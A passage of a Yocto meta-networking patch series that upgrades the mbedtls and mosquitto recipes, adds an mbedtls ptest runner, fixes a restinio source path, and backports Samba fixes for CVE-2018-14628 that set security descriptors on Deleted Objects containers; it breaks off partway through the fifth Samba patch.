+1,17 @@ +#!/bin/sh + +ptestdir=$(dirname "$(readlink -f "$0")") +cd "$ptestdir"/tests || exit + +tests=$(find * -type f -name 'test_suite_*') + +for f in $tests +do + if test -x ./"$f"; then + if ./"$f" > ./"$f".out 2> ./"$f".err; then + echo "PASS: $f" + else + echo "FAIL: $f" + fi + fi +done diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.0.bb b/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.7.bb index d4a9c7bf8d..793cdcaff7 100644 --- a/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.0.bb +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls_2.28.7.bb @@ -17,16 +17,16 @@ understand what the code does. It features: \ HOMEPAGE = "https://tls.mbed.org/" -LICENSE = "Apache-2.0" -LIC_FILES_CHKSUM = "file://LICENSE;md5=3b83ef96387f14655fc854ddc3c6bd57" +LICENSE = "Apache-2.0 | GPL-2.0-or-later" +LIC_FILES_CHKSUM = "file://LICENSE;md5=379d5819937a6c2f1ef1630d341e026d" SECTION = "libs" S = "${WORKDIR}/git" -SRCREV = "8b3f26a5ac38d4fdccbc5c5366229f3e01dafcc0" +SRCREV = "555f84735aecdbd76a566cf087ec8425dfb0c8ab" SRC_URI = "git://github.com/ARMmbed/mbedtls.git;protocol=https;branch=mbedtls-2.28" -inherit cmake +inherit cmake update-alternatives PACKAGECONFIG ??= "shared-libs programs" PACKAGECONFIG[shared-libs] = "-DUSE_SHARED_MBEDTLS_LIBRARY=ON,-DUSE_SHARED_MBEDTLS_LIBRARY=OFF" @@ -41,4 +41,7 @@ RPROVIDES:${PN} = "polarssl" PACKAGES =+ "${PN}-programs" FILES:${PN}-programs = "${bindir}/" +ALTERNATIVE:${PN}-programs = "hello" +ALTERNATIVE_LINK_NAME[hello] = "${bindir}/hello" + BBCLASSEXTEND = "native nativesdk" diff --git a/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb b/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb new file mode 100644 index 0000000000..2fedac48cf --- /dev/null +++ b/meta-networking/recipes-connectivity/mbedtls/mbedtls_3.5.2.bb @@ -0,0 +1,81 @@ +SUMMARY = "Lightweight crypto and SSL/TLS library" +DESCRIPTION = "mbedtls is a lean open source crypto library \ +for providing SSL and TLS support in your programs. It offers \ +an intuitive API and documented header files, so you can actually \ +understand what the code does. It features: \ + \ + - Symmetric algorithms, like AES, Blowfish, Triple-DES, DES, ARC4, \ + Camellia and XTEA \ + - Hash algorithms, like SHA-1, SHA-2, RIPEMD-160 and MD5 \ + - Entropy pool and random generators, like CTR-DRBG and HMAC-DRBG \ + - Public key algorithms, like RSA, Elliptic Curves, Diffie-Hellman, \ + ECDSA and ECDH \ + - SSL v3 and TLS 1.0, 1.1 and 1.2 \ + - Abstraction layers for ciphers, hashes, public key operations, \ + platform abstraction and threading \ +" + +HOMEPAGE = "https://tls.mbed.org/" + +LICENSE = "Apache-2.0 | GPL-2.0-or-later" +LIC_FILES_CHKSUM = "file://LICENSE;md5=379d5819937a6c2f1ef1630d341e026d" + +SECTION = "libs" + +S = "${WORKDIR}/git" +SRCREV = "daca7a3979c22da155ec9dce49ab1abf3b65d3a9" +SRC_URI = "git://github.com/ARMmbed/mbedtls.git;protocol=https;branch=master \ + file://0001-AES-NI-use-target-attributes-for-x86-32-bit-intrinsi.patch \ + file://run-ptest" +UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" + +inherit cmake update-alternatives ptest + +# Build with the v2 LTS version by default +DEFAULT_PREFERENCE = "-1" + +PACKAGECONFIG ??= "shared-libs programs ${@bb.utils.contains('PTEST_ENABLED', '1', 'tests', '', d)}" +PACKAGECONFIG[shared-libs] = "-DUSE_SHARED_MBEDTLS_LIBRARY=ON,-DUSE_SHARED_MBEDTLS_LIBRARY=OFF" +PACKAGECONFIG[programs] = "-DENABLE_PROGRAMS=ON,-DENABLE_PROGRAMS=OFF" +PACKAGECONFIG[werror] = "-DMBEDTLS_FATAL_WARNINGS=ON,-DMBEDTLS_FATAL_WARNINGS=OFF" +# Make X.509 and TLS calls use PSA +# https://github.com/Mbed-TLS/mbedtls/blob/development/docs/use-psa-crypto.md +PACKAGECONFIG[psa] = "" +PACKAGECONFIG[tests] = "-DENABLE_TESTING=ON,-DENABLE_TESTING=OFF" + +EXTRA_OECMAKE = "-DLIB_INSTALL_DIR:STRING=${libdir}" + +# For now the only way to enable PSA is to explicitly pass a -D via CFLAGS +CFLAGS:append = "${@bb.utils.contains('PACKAGECONFIG', 'psa', ' -DMBEDTLS_USE_PSA_CRYPTO', '', d)}" + +PROVIDES += "polarssl" +RPROVIDES:${PN} = "polarssl" + +PACKAGES =+ "${PN}-programs" +FILES:${PN}-programs = "${bindir}/" + +ALTERNATIVE:${PN}-programs = "hello" +ALTERNATIVE_LINK_NAME[hello] = "${bindir}/hello" + +BBCLASSEXTEND = "native nativesdk" + +CVE_PRODUCT = "mbed_tls" + +# Strip host paths from autogenerated test files +do_compile:append() { + sed -i 's+${S}/++g' ${B}/tests/*.c 2>/dev/null || : + sed -i 's+${B}/++g' ${B}/tests/*.c 2>/dev/null || : +} + +# Export source files/headers needed by Arm Trusted Firmware +sysroot_stage_all:append() { + sysroot_stage_dir "${S}/library" "${SYSROOT_DESTDIR}/usr/share/mbedtls-source/library" + sysroot_stage_dir "${S}/include" "${SYSROOT_DESTDIR}/usr/share/mbedtls-source/include" +} + +do_install_ptest () { + install -d ${D}${PTEST_PATH}/tests + cp -f ${B}/tests/test_suite_* ${D}${PTEST_PATH}/tests/ + find ${D}${PTEST_PATH}/tests/ -type f -name "*.c" -delete + cp -fR ${S}/tests/data_files ${D}${PTEST_PATH}/tests/ +} diff --git a/meta-networking/recipes-connectivity/mosquitto/files/2894.patch b/meta-networking/recipes-connectivity/mosquitto/files/2894.patch new file mode 100644 index 0000000000..7374cbd26f --- /dev/null +++ b/meta-networking/recipes-connectivity/mosquitto/files/2894.patch @@ -0,0 +1,25 @@ +From: Joachim Zobel <jz-2017@heute-morgen.de> +Date: Wed, 13 Sep 2023 09:55:34 +0200 +Subject: [PATCH] Link correctly with shared websockets library if needed see: + https://github.com/eclipse/mosquitto/pull/2751 + +Patch contributed by Joachim Zobel <jz-2017@heute-morgen.de> and Daniel Engberg <daniel.engberg.lists@pyret.net> +--- +Upstream-Status: Pending + + src/CMakeLists.txt | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/CMakeLists.txt b/src/CMakeLists.txt +index 9380a04..dce8313 100644 +--- a/src/CMakeLists.txt ++++ b/src/CMakeLists.txt +@@ -200,7 +200,7 @@ if (WITH_WEBSOCKETS) + link_directories(${mosquitto_SOURCE_DIR}) + endif (WIN32) + else (STATIC_WEBSOCKETS) +- set (MOSQ_LIBS ${MOSQ_LIBS} websockets) ++ set (MOSQ_LIBS ${MOSQ_LIBS} websockets_shared) + endif (STATIC_WEBSOCKETS) + endif (WITH_WEBSOCKETS) + diff --git a/meta-networking/recipes-connectivity/mosquitto/files/2895.patch b/meta-networking/recipes-connectivity/mosquitto/files/2895.patch new file mode 100644 index 0000000000..853f881754 --- /dev/null +++ b/meta-networking/recipes-connectivity/mosquitto/files/2895.patch @@ -0,0 +1,27 @@ +From: Joachim Zobel <jz-2017@heute-morgen.de> +Date: Wed, 13 Sep 2023 10:05:43 +0200 +Subject: [PATCH] Mosquitto now waits for network-online when starting + (Closes: #1036450) + +See: https://github.com/eclipse/mosquitto/issues/2878 +--- +Upstream-Status: Pending + + service/systemd/mosquitto.service.simple | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/service/systemd/mosquitto.service.simple b/service/systemd/mosquitto.service.simple +index 15ee0d6..c2a330b 100644 +--- a/service/systemd/mosquitto.service.simple ++++ b/service/systemd/mosquitto.service.simple +@@ -1,8 +1,8 @@ + [Unit] + Description=Mosquitto MQTT Broker + Documentation=man:mosquitto.conf(5) man:mosquitto(8) +-After=network.target +-Wants=network.target ++After=network-online.target ++Wants=network-online.target + + [Service] + ExecStart=/usr/sbin/mosquitto -c /etc/mosquitto/mosquitto.conf diff --git a/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init b/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init index 9d5963c418..d0da219d6d 100644 --- a/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init +++ b/meta-networking/recipes-connectivity/mosquitto/files/mosquitto.init @@ -1,18 +1,18 @@ -#! /bin/sh +#!/bin/sh # Based on the Debian initscript for mosquitto ### BEGIN INIT INFO -# Provides: mosquitto -# Required-Start: $remote_fs $syslog -# Required-Stop: $remote_fs $syslog -# Default-Start: 2 3 4 5 -# Default-Stop: 0 1 6 -# Short-Description: mosquitto MQTT message broker -# Description: -# This is a message broker that supports version 3.1/3.1.1 of the MQ Telemetry +# Provides: mosquitto +# Required-Start: $remote_fs $syslog +# Required-Stop: $remote_fs $syslog +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: mosquitto MQTT 3.1/3.1.1 message broker +# Description: +# This is a message broker that supports version 3.1 of the MQ Telemetry # Transport (MQTT) protocol. -# +# # MQTT provides a method of carrying out messaging using a publish/subscribe # model. It is lightweight, both in terms of bandwidth usage and ease of # implementation. This makes it particularly useful at the edge of the network diff --git a/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.14.bb b/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.18.bb index 739b7de625..ea9eb4857b 100644 --- a/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.14.bb +++ b/meta-networking/recipes-connectivity/mosquitto/mosquitto_2.0.18.bb @@ -17,13 +17,15 @@ DEPENDS = "uthash cjson" SRC_URI = "http://mosquitto.org/files/source/mosquitto-${PV}.tar.gz \ file://mosquitto.init \ file://1571.patch \ + file://2894.patch \ + file://2895.patch \ " -SRC_URI[sha256sum] = "d0dde8fdb12caf6e2426b4f28081919a2fce3448773bdb8af0d3cd5fe5776925" +SRC_URI[sha256sum] = "d665fe7d0032881b1371a47f34169ee4edab67903b2cd2b4c083822823f4448a" inherit systemd update-rc.d useradd cmake pkgconfig -PACKAGECONFIG ??= "ssl dlt websockets \ +PACKAGECONFIG ??= "ssl websockets \ ${@bb.utils.filter('DISTRO_FEATURES','systemd', d)} \ " @@ -87,4 +89,4 @@ USERADD_PACKAGES = "${PN}" USERADD_PARAM:${PN} = "--system --no-create-home --shell /bin/false \ --user-group mosquitto" -BBCLASSEXTEND += "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb b/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb index e715135dc3..03eff43dd2 100644 --- a/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb +++ b/meta-networking/recipes-connectivity/restinio/restinio_0.6.13.bb @@ -9,11 +9,11 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://../LICENSE;md5=f399b62ce0a152525d1589a5a40c0ff6" DEPENDS = "asio fmt http-parser" -SRC_URI = "https://github.com/Stiffstream/restinio/releases/download/v.${PV}/restinio-${PV}.tar.bz2" +SRC_URI = "https://github.com/Stiffstream/restinio/releases/download/v.${PV}/${BP}.tar.bz2" SRC_URI[md5sum] = "37a4310e98912030a74bdd4ed789f33c" SRC_URI[sha256sum] = "b35d696e6fafd4563ca708fcecf9d0cf6705c846d417b5000f5252e0188848e7" -S = "${WORKDIR}/${PN}-${PV}/dev" +S = "${WORKDIR}/${BP}/dev" inherit cmake diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch new file mode 100644 index 0000000000..d938e8cd66 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0001.patch @@ -0,0 +1,147 @@ +From cbbfc917b9635bc62825ea64a157028297f54fb7 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:35:31 +0100 +Subject: [PATCH] CVE-2018-14628: python:descriptor: let samba-tool dbcheck fix + the nTSecurityDescriptor on CN=Deleted Objects containers + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 97e4aab1a6e2feda7c6c6fdeaa7c3e1818c55566) + +Autobuild-User(v4-18-test): Jule Anger <janger@samba.org> +Autobuild-Date(v4-18-test): Mon Oct 23 09:52:22 UTC 2023 on atb-devel-224 + +CVE: CVE-2018-14628 + +Upstream-Status: Backport[https://github.com/samba-team/samba/commit/cbbfc917b9635bc62825ea64a157028297f54fb7] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/dbchecker.py | 10 ++++++++-- + python/samba/descriptor.py | 15 ++++++++++++++- + testprogs/blackbox/dbcheck-links.sh | 12 ++++++++++++ + 3 files changed, 34 insertions(+), 3 deletions(-) + +diff --git a/python/samba/dbchecker.py b/python/samba/dbchecker.py +index d10d765..d8c2341 100644 +--- a/python/samba/dbchecker.py ++++ b/python/samba/dbchecker.py +@@ -2433,7 +2433,7 @@ newSuperior: %s""" % (str(from_dn), str(to_rdn), str(to_base))) + error_count += 1 + continue + +- if self.reset_well_known_acls: ++ if dn == deleted_objects_dn or self.reset_well_known_acls: + try: + well_known_sd = self.get_wellknown_sd(dn) + except KeyError: +@@ -2442,7 +2442,13 @@ newSuperior: %s""" % (str(from_dn), str(to_rdn), str(to_base))) + current_sd = ndr_unpack(security.descriptor, + obj[attrname][0]) + +- diff = get_diff_sds(well_known_sd, current_sd, security.dom_sid(self.samdb.get_domain_sid())) ++ ignoreAdditionalACEs = False ++ if not self.reset_well_known_acls: ++ ignoreAdditionalACEs = True ++ ++ diff = get_diff_sds(well_known_sd, current_sd, ++ security.dom_sid(self.samdb.get_domain_sid()), ++ ignoreAdditionalACEs=ignoreAdditionalACEs) + if diff != "": + self.err_wrong_default_sd(dn, well_known_sd, diff) + error_count += 1 +diff --git a/python/samba/descriptor.py b/python/samba/descriptor.py +index 0998348..08cfab0 100644 +--- a/python/samba/descriptor.py ++++ b/python/samba/descriptor.py +@@ -407,6 +407,7 @@ def get_wellknown_sds(samdb): + # Then subcontainers + subcontainers = [ + (ldb.Dn(samdb, "%s" % str(samdb.domain_dn())), get_domain_descriptor), ++ (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(samdb.domain_dn())), get_deletedobjects_descriptor), + (ldb.Dn(samdb, "CN=LostAndFound,%s" % str(samdb.domain_dn())), get_domain_delete_protected2_descriptor), + (ldb.Dn(samdb, "CN=System,%s" % str(samdb.domain_dn())), get_domain_delete_protected1_descriptor), + (ldb.Dn(samdb, "CN=Infrastructure,%s" % str(samdb.domain_dn())), get_domain_infrastructure_descriptor), +@@ -417,6 +418,7 @@ def get_wellknown_sds(samdb): + (ldb.Dn(samdb, "CN=MicrosoftDNS,CN=System,%s" % str(samdb.domain_dn())), get_dns_domain_microsoft_dns_descriptor), + + (ldb.Dn(samdb, "%s" % str(samdb.get_config_basedn())), get_config_descriptor), ++ (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(samdb.get_config_basedn())), get_deletedobjects_descriptor), + (ldb.Dn(samdb, "CN=NTDS Quotas,%s" % str(samdb.get_config_basedn())), get_config_ntds_quotas_descriptor), + (ldb.Dn(samdb, "CN=LostAndFoundConfig,%s" % str(samdb.get_config_basedn())), get_config_delete_protected1wd_descriptor), + (ldb.Dn(samdb, "CN=Services,%s" % str(samdb.get_config_basedn())), get_config_delete_protected1_descriptor), +@@ -441,6 +443,9 @@ def get_wellknown_sds(samdb): + if ldb.Dn(samdb, nc.decode('utf8')) == dnsforestdn: + c = (ldb.Dn(samdb, "%s" % str(dnsforestdn)), get_dns_partition_descriptor) + subcontainers.append(c) ++ c = (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(dnsforestdn)), ++ get_deletedobjects_descriptor) ++ subcontainers.append(c) + c = (ldb.Dn(samdb, "CN=Infrastructure,%s" % str(dnsforestdn)), + get_domain_delete_protected1_descriptor) + subcontainers.append(c) +@@ -456,6 +461,9 @@ def get_wellknown_sds(samdb): + if ldb.Dn(samdb, nc.decode('utf8')) == dnsdomaindn: + c = (ldb.Dn(samdb, "%s" % str(dnsdomaindn)), get_dns_partition_descriptor) + subcontainers.append(c) ++ c = (ldb.Dn(samdb, "CN=Deleted Objects,%s" % str(dnsdomaindn)), ++ get_deletedobjects_descriptor) ++ subcontainers.append(c) + c = (ldb.Dn(samdb, "CN=Infrastructure,%s" % str(dnsdomaindn)), + get_domain_delete_protected1_descriptor) + subcontainers.append(c) +@@ -548,7 +556,8 @@ def get_clean_sd(sd): + return sd_clean + + +-def get_diff_sds(refsd, cursd, domainsid, checkSacl=True): ++def get_diff_sds(refsd, cursd, domainsid, checkSacl=True, ++ ignoreAdditionalACEs=False): + """Get the difference between 2 sd + + This function split the textual representation of ACL into smaller +@@ -603,6 +612,10 @@ def get_diff_sds(refsd, cursd, domainsid, checkSacl=True): + h_ref.remove(k) + + if len(h_cur) + len(h_ref) > 0: ++ if txt == "" and len(h_ref) == 0: ++ if ignoreAdditionalACEs: ++ return "" ++ + txt = "%s\tPart %s is different between reference" \ + " and current here is the detail:\n" % (txt, part) + +diff --git a/testprogs/blackbox/dbcheck-links.sh b/testprogs/blackbox/dbcheck-links.sh +index f00fe46..06b24fb 100755 +--- a/testprogs/blackbox/dbcheck-links.sh ++++ b/testprogs/blackbox/dbcheck-links.sh +@@ -58,6 +58,16 @@ dbcheck() { + fi + } + ++dbcheck_acl_reset() ++{ ++ $PYTHON $BINDIR/samba-tool dbcheck -H tdb://$PREFIX_ABS/${RELEASE}/private/sam.ldb --cross-ncs --fix --yes --attrs=nTSecurityDescriptor ++} ++ ++dbcheck_acl_clean() ++{ ++ $PYTHON $BINDIR/samba-tool dbcheck -H tdb://$PREFIX_ABS/${RELEASE}/private/sam.ldb --cross-ncs --attrs=nTSecurityDescriptor ++} ++ + dbcheck_dangling() { + dbcheck "" "1" "--selftest-check-expired-tombstones" + return $? +@@ -893,6 +903,8 @@ EOF + remove_directory $PREFIX_ABS/${RELEASE} + + testit $RELEASE undump || failed=`expr $failed + 1` ++testit_expect_failure "dbcheck_acl_reset" dbcheck_acl_reset || failed=$(expr $failed + 1) ++testit "dbcheck_acl_clean" dbcheck_acl_clean || failed=$(expr $failed + 1) + testit "add_two_more_users" add_two_more_users || failed=`expr $failed + 1` + testit "add_four_more_links" add_four_more_links || failed=`expr $failed + 1` + testit "remove_one_link" remove_one_link || failed=`expr $failed + 1` +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch new file mode 100644 index 0000000000..e3d45627a5 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0002.patch @@ -0,0 +1,72 @@ +From f967b91da76f86a9feb4c1469fccfce93be8bc79 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Wed, 7 Jun 2023 18:18:58 +0200 +Subject: [PATCH] CVE-2018-14628: dbchecker: use get_deletedobjects_descriptor + for missing deleted objects container + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 70586061128f90afa33f25e104d4570a1cf778db) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/f967b91da76f86a9feb4c1469fccfce93be8bc79] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/dbchecker.py | 16 +++++++++++++--- + 1 file changed, 13 insertions(+), 3 deletions(-) + +diff --git a/python/samba/dbchecker.py b/python/samba/dbchecker.py +index d8c2341..35b6eeb 100644 +--- a/python/samba/dbchecker.py ++++ b/python/samba/dbchecker.py +@@ -21,7 +21,7 @@ from __future__ import print_function + import ldb + import samba + import time +-from base64 import b64decode ++from base64 import b64decode, b64encode + from samba import dsdb + from samba import common + from samba.dcerpc import misc +@@ -30,7 +30,11 @@ from samba.ndr import ndr_unpack, ndr_pack + from samba.dcerpc import drsblobs + from samba.samdb import dsdb_Dn + from samba.dcerpc import security +-from samba.descriptor import get_wellknown_sds, get_diff_sds ++from samba.descriptor import ( ++ get_wellknown_sds, ++ get_deletedobjects_descriptor, ++ get_diff_sds ++) + from samba.auth import system_session, admin_session + from samba.netcmd import CommandError + from samba.netcmd.fsmo import get_fsmo_roleowner +@@ -340,6 +344,11 @@ class dbcheck(object): + wko_prefix = "B:32:%s" % dsdb.DS_GUID_DELETED_OBJECTS_CONTAINER + listwko.append('%s:%s' % (wko_prefix, dn)) + guid_suffix = "" ++ ++ domain_sid = security.dom_sid(self.samdb.get_domain_sid()) ++ sec_desc = get_deletedobjects_descriptor(domain_sid, ++ name_map=self.name_map) ++ sec_desc_b64 = b64encode(sec_desc).decode('utf8') + + # Insert a brand new Deleted Objects container + self.samdb.add_ldif("""dn: %s +@@ -349,7 +358,8 @@ description: Container for deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + showInAdvancedViewOnly: TRUE +-systemFlags: -1946157056%s""" % (dn, guid_suffix), ++nTSecurityDescriptor:: %s ++systemFlags: -1946157056%s""" % (dn, sec_desc_b64, guid_suffix), + controls=["relax:0", "provision:0"]) + + delta = ldb.Message() +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch new file mode 100644 index 0000000000..df30e0c106 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0003.patch @@ -0,0 +1,106 @@ +From edac27f5408191567233983562091484ebbbad0a Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Mon, 26 Jun 2023 15:14:24 +0200 +Subject: [PATCH] CVE-2018-14628: s4:dsdb: remove unused code in + dirsync_filter_entry() + +This makes the next change easier to understand. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 498542be0bbf4f26558573c1f87b77b8e3509371) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/edac27f5408191567233983562091484ebbbad0a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/dsdb/samdb/ldb_modules/dirsync.c | 53 +++--------------------- + 1 file changed, 5 insertions(+), 48 deletions(-) + +diff --git a/source4/dsdb/samdb/ldb_modules/dirsync.c b/source4/dsdb/samdb/ldb_modules/dirsync.c +index e61ade8..e7fb27f 100644 +--- a/source4/dsdb/samdb/ldb_modules/dirsync.c ++++ b/source4/dsdb/samdb/ldb_modules/dirsync.c +@@ -152,10 +152,6 @@ static int dirsync_filter_entry(struct ldb_request *req, + * list only the attribute that have been modified since last interogation + * + */ +- newmsg = ldb_msg_new(dsc->req); +- if (newmsg == NULL) { +- return ldb_oom(ldb); +- } + for (i = msg->num_elements - 1; i >= 0; i--) { + if (ldb_attr_cmp(msg->elements[i].name, "uSNChanged") == 0) { + int error = 0; +@@ -202,11 +198,6 @@ static int dirsync_filter_entry(struct ldb_request *req, + */ + return LDB_SUCCESS; + } +- newmsg->dn = ldb_dn_new(newmsg, ldb, ""); +- if (newmsg->dn == NULL) { +- return ldb_oom(ldb); +- } +- + el = ldb_msg_find_element(msg, "objectGUID"); + if ( el != NULL) { + guidfound = true; +@@ -217,48 +208,14 @@ static int dirsync_filter_entry(struct ldb_request *req, + * well will uncomment the code bellow + */ + SMB_ASSERT(guidfound == true); +- /* +- if (guidfound == false) { +- struct GUID guid; +- struct ldb_val *new_val; +- DATA_BLOB guid_blob; +- +- tmp[0] = '\0'; +- txt = strrchr(txt, ':'); +- if (txt == NULL) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- txt++; +- +- status = GUID_from_string(txt, &guid); +- if (!NT_STATUS_IS_OK(status)) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- +- status = GUID_to_ndr_blob(&guid, msg, &guid_blob); +- if (!NT_STATUS_IS_OK(status)) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- +- new_val = talloc(msg, struct ldb_val); +- if (new_val == NULL) { +- return ldb_oom(ldb); +- } +- new_val->data = talloc_steal(new_val, guid_blob.data); +- new_val->length = guid_blob.length; +- if (ldb_msg_add_value(msg, "objectGUID", new_val, NULL) != 0) { +- return ldb_module_done(dsc->req, NULL, NULL, LDB_ERR_OPERATIONS_ERROR); +- } +- } +- */ +- ldb_msg_add(newmsg, el, LDB_FLAG_MOD_ADD); +- talloc_steal(newmsg->elements, el->name); +- talloc_steal(newmsg->elements, el->values); +- +- talloc_steal(newmsg->elements, msg); + return ldb_module_send_entry(dsc->req, msg, controls); + } + ++ newmsg = ldb_msg_new(dsc->req); ++ if (newmsg == NULL) { ++ return ldb_oom(ldb); ++ } ++ + ndr_err = ndr_pull_struct_blob(replMetaData, dsc, &rmd, + (ndr_pull_flags_fn_t)ndr_pull_replPropertyMetaDataBlob); + if (!NDR_ERR_CODE_IS_SUCCESS(ndr_err)) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch new file mode 100644 index 0000000000..6fa4ef10dd --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0004.patch @@ -0,0 +1,64 @@ +From 74a508b39e6fd5036a2adc99d559bd3852f8ce8d Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:34:15 +0100 +Subject: [PATCH] CVE-2018-14628: s4:setup: set the correct + nTSecurityDescriptor on the CN=Deleted Objects container + +This revealed a bug in our dirsync code, so we mark +test_search_with_dirsync_deleted_objects as knownfail. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 7f8b15faa76d05023c987fac2c4c31f9ac61bb47) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/74a508b39e6fd5036a2adc99d559bd3852f8ce8d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/setup/provision.ldif | 1 + + source4/setup/provision_configuration.ldif | 1 + + source4/setup/provision_dnszones_add.ldif | 1 + + 3 files changed, 3 insertions(+) + +diff --git a/source4/setup/provision.ldif b/source4/setup/provision.ldif +index 5d9eba4..7f966fd 100644 +--- a/source4/setup/provision.ldif ++++ b/source4/setup/provision.ldif +@@ -34,6 +34,7 @@ isDeleted: TRUE + isCriticalSystemObject: TRUE + showInAdvancedViewOnly: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + # Computers located in "provision_computers*.ldif" + # Users/Groups located in "provision_users*.ldif" +diff --git a/source4/setup/provision_configuration.ldif b/source4/setup/provision_configuration.ldif +index 53c9c85..8fcbddb 100644 +--- a/source4/setup/provision_configuration.ldif ++++ b/source4/setup/provision_configuration.ldif +@@ -14,6 +14,7 @@ description: Container for deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + # Extended rights + +diff --git a/source4/setup/provision_dnszones_add.ldif b/source4/setup/provision_dnszones_add.ldif +index 860aa4b..a2d6b6b 100644 +--- a/source4/setup/provision_dnszones_add.ldif ++++ b/source4/setup/provision_dnszones_add.ldif +@@ -8,6 +8,7 @@ description: Deleted objects + isDeleted: TRUE + isCriticalSystemObject: TRUE + systemFlags: -1946157056 ++nTSecurityDescriptor:: ${DELETEDOBJECTS_DESCRIPTOR} + + dn: CN=LostAndFound,${ZONE_DN} + objectClass: top +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch new file mode 100644 index 0000000000..b0a8ef2535 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0005.patch @@ -0,0 +1,98 @@ +From 46a168c9a89e82ccaf8d27669d1ae5459f7becb9 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:33:37 +0100 +Subject: [PATCH] CVE-2018-14628: python:provision: make + DELETEDOBJECTS_DESCRIPTOR available in the ldif files + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 0c329a0fda37d87ed737e4b579b6d04ec907604c) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/46a168c9a89e82ccaf8d27669d1ae5459f7becb9] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/provision/__init__.py | 5 +++++ + 